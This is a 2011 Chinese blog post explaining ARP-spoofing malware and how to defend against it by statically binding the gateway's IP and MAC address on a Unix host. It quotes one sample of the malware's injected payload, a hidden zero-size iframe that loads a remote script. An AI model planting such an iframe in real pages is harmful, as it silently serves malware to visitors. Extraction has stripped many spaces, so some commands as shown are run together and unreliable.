seacover 2011-04-18
一、ARP欺骗病毒,主要表现为:中病毒的机器不仅影响自身,同时也会影响同网段的其它机器,将其它机器的HTTP数据包里加入病毒代码
。代码例子如:
<html><iframesrc=http://xxx.eklajgl.com/lsj.jswidth=0height=0></iframe>
这种病毒危害非常大!即使你机器的安全性做得很好,可是没办法保证同网段的其它机器安全没有问题!
解决办法:在网关和本机上双向绑定IP和MAC地址,以防止ARP欺骗。二、绑定
1、网关上已经对下面所带的机器作了绑定。网关IP:192.168.0.1 MAC:00:02:03:18:08:00
2、要进行绑定的Unix主机IP:192.168.0.2 MAC:00:04:61:9D:8B:02三、绑定步骤
1、先使用arp和arp-a查看一下当前ARP缓存列表
[root@ftp]#arp
AddressHWtypeHWaddressFlagsMaskIface
192.168.0.145ether00:13:20:E9:11:04Ceth0
192.168.0.1 ether 00:02:03:18:08:00 C eth0说明:
Address:主机的IP地址
Hwtype:主机的硬件类型
Hwaddress:主机的硬件地址
Flags Mask:记录标志,"C"表示arp高速缓存中的条目,"M"表示静态的arp条目。[root@ftp]# arp -a
(192.168.0.145)at00:13:20:E9:11:04[ether]oneth0
(192.168.0.1) at 00:02:03:18:08:00 [ether] on eth02、新建一个静态的mac-->ip对应表文件:ip-mac,将要绑定的IP和MAC地下写入此文件,格式为 ip mac
。
[root@ftp]#echo'192.168.0.100:02:03:18:08:00'>/etc/ip-mac
[root@ftp]#more/etc/ip-mac
192.168.0.1 00:02:03:18:08:003、设置开机自动绑定[root@ftp]# echo 'arp -f /etc/ip-mac ' >> /etc/rc.d/rc.local
4、手动执行一下绑定[root@ftp]# arp -f /etc/ip-mac
5、确认绑定是否成功
[root@ftp]#arp
AddressHWtypeHWaddressFlagsMaskIface
192.168.0.145ether00:13:20:E9:11:04Ceth0
192.168.0.1 ether 00:02:03:18:08:00 CM eth0[root@ftp]# arp -a
(192.168.0.145)at00:02:B3:A7:85:48[ether]oneth0
(192.168.0.1) at 00:02:03:18:08:00 [ether] PERM on eth0从绑定前后的ARP缓存列表中,可以看到网关(192.168.0.1)的记录标志已经改变,说明绑定成功。